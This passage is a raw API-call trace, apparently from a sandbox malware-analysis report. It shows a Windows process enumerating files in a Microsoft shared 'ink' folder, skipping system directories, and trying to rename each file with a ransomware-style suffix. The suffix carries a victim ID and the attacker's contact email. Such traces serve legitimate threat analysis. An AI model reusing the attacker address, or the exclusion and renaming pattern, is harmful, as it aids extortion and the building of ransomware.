lpFileSize=0x345ebf8*=9663916936418904) returned 0 [0068.439] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.439] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.439] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.439] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.439] CloseHandle (hObject=0xffffffff) returned 1 [0068.439] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0068.439] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.439] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.439] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.439] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.439] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.439] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.439] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0068.439] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.439] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0068.439] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.439] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.439] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.439] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.439] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfra.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.439] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.439] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0068.439] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0068.439] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d126e12, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x9e4, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ipshe.xml", cAlternateFileName="")) returned 1 [0068.439] lstrcmpiW (lpString1="ipshe.xml", lpString2=".") returned 1 [0068.439] lstrcmpiW (lpString1="ipshe.xml", lpString2="..") returned 1 [0068.439] lstrcmpiW (lpString1="ipshe.xml", lpString2="...") returned 1 [0068.439] lstrcmpiW (lpString1="ipshe.xml", lpString2="windows") returned -1 [0068.440] lstrcmpiW (lpString1="ipshe.xml", lpString2="recovery") returned -1 [0068.440] lstrcmpiW (lpString1="ipshe.xml", lpString2="perflogs") returned -1 [0068.440] lstrcmpiW (lpString1="ipshe.xml", lpString2="documents and settings") returned 1 [0068.440] lstrcmpiW (lpString1="ipshe.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.440] lstrcmpiW (lpString1="ipshe.xml", lpString2="system volume information") returned -1 [0068.440] lstrcmpiW (lpString1="ipshe.xml", lpString2="msocache") returned -1 [0068.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0068.440] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipshe.xml", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0068.440] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipshe.xml", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipshe.xml", lpUsedDefaultChar=0x0) returned 9 [0068.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0068.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0068.440] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipshe.xml", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0068.440] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipshe.xml", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipshe.xml", lpUsedDefaultChar=0x0) returned 9 [0068.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0068.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0068.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.440] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.440] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.440] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshe.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshe.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.441] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9652234625373512) returned 0 [0068.441] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.441] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.441] CloseHandle (hObject=0xffffffff) returned 1 [0068.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0068.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0068.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0068.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.441] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshe.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshe.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshe.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshe.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0068.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.441] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d126e12, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x9d6, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ipshi.xml", cAlternateFileName="")) returned 1 [0068.442] lstrcmpiW (lpString1="ipshi.xml", lpString2=".") returned 1 [0068.442] lstrcmpiW (lpString1="ipshi.xml", lpString2="..") returned 1 [0068.442] lstrcmpiW (lpString1="ipshi.xml", lpString2="...") returned 1 [0068.442] lstrcmpiW (lpString1="ipshi.xml", lpString2="windows") returned -1 [0068.442] lstrcmpiW (lpString1="ipshi.xml", lpString2="recovery") returned -1 [0068.442] lstrcmpiW (lpString1="ipshi.xml", lpString2="perflogs") returned -1 [0068.442] lstrcmpiW (lpString1="ipshi.xml", lpString2="documents and settings") returned 1 [0068.442] lstrcmpiW (lpString1="ipshi.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.442] lstrcmpiW (lpString1="ipshi.xml", lpString2="system volume information") returned -1 [0068.442] lstrcmpiW (lpString1="ipshi.xml", lpString2="msocache") returned -1 [0068.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0068.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipshi.xml", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0068.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipshi.xml", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipshi.xml", lpUsedDefaultChar=0x0) returned 9 [0068.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0068.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipshi.xml", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0068.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipshi.xml", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipshi.xml", lpUsedDefaultChar=0x0) returned 9 [0068.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0068.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0068.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0068.442] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshi.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.442] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9659828127551208) returned 0 [0068.442] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.442] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.443] CloseHandle (hObject=0xffffffff) returned 1 [0068.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0068.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0068.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0068.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.443] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshi.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshi.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshi.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0068.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0068.443] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c940eb6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c940eb6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c96711d, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa5c, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ipshrv.xml", cAlternateFileName="")) returned 1 [0068.443] lstrcmpiW (lpString1="ipshrv.xml", lpString2=".") returned 1 [0068.443] lstrcmpiW (lpString1="ipshrv.xml", lpString2="..") returned 1 [0068.443] lstrcmpiW (lpString1="ipshrv.xml", lpString2="...") returned 1 [0068.443] lstrcmpiW (lpString1="ipshrv.xml", lpString2="windows") returned -1 [0068.443] lstrcmpiW (lpString1="ipshrv.xml", lpString2="recovery") returned -1 [0068.443] lstrcmpiW (lpString1="ipshrv.xml", lpString2="perflogs") returned -1 [0068.443] lstrcmpiW (lpString1="ipshrv.xml", lpString2="documents and settings") returned 1 [0068.443] lstrcmpiW (lpString1="ipshrv.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.443] lstrcmpiW (lpString1="ipshrv.xml", lpString2="system volume information") returned -1 [0068.443] lstrcmpiW (lpString1="ipshrv.xml", lpString2="msocache") returned -1 [0068.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0068.443] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipshrv.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipshrv.xml", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipshrv.xml", lpUsedDefaultChar=0x0) returned 10 [0068.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0068.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0068.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipshrv.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipshrv.xml", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipshrv.xml", lpUsedDefaultChar=0x0) returned 10 [0068.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0068.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0068.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0068.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0068.444] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshrv.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.444] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9666837514178144) returned 0 [0068.444] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.444] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.444] CloseHandle (hObject=0xffffffff) returned 1 [0068.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a228 [0068.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a228, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a228 | out: hHeap=0x1e0000) returned 1 [0068.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.445] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshrv.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshrv.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0068.445] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d14d081, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d14d081, ftLastAccessTime.dwHighDateTime=0x1d2a02a, 